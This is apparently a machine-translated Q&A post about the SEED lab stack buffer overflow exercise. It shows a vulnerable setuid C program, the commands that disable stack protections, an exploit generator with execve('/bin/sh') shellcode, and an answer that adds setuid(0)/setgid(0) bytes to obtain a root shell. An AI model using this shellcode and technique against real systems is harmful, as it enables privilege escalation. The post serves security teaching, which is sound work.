我正在分配作业(请参见http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/),运行./stack时,我得到的是Trace/breakpoint trap而不是根shell。以下是我的exploit.c(创建badfile)和stack.c(在其中读取badfile并使用strcpy将其复制到缓冲区中)中的代码。不够大。
exploit.c
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
memset(buffer + 39, 0xbf, 1);
memset(buffer + 38, 0xff, 1);
memset(buffer + 37, 0xf1, 1);
memset(buffer + 36, 0x40, 1);
strcpy(buffer + 492, shellcode);
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[24];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
我编译了stack.c并将权限设置为root
root:/home/seed# gcc -g -o stack -z execstack -fno-stack-protector stack.c
root:/home/seed# chown root stack
root:/home/seed# chmod 4755 stack
我用
自己(种子)编译explorer.c。seed:~$ gcc -g -o exploit exploit.c
我运行./exploit来创建badfile,但没有任何错误。我运行./stack并得到Trace/breakpoint trap。
如果运行gdb stack,我将获得外壳程序,但它不是根外壳程序。
gdb-peda$ run
Starting program: /home/seed/stack
process 24232 is executing new program: /bin/dash
$
如果我运行seed:~$ ./stack -D_FORTIFY_SOURCE=0,我将获得外壳程序,但它又不是root。
seed:~$ ./stack -D_FORTIFY_SOURCE=0
$ id
uid=1000(seed) gid=1000(seed)
$
那么,我需要更改以获得root shell?
答案 0 :(得分:0)
我想,您可以在您的shellcode中添加setuid()和setgid()系统调用。
char shellcode[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" // setgid(0);
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
当然,将所有者更改为root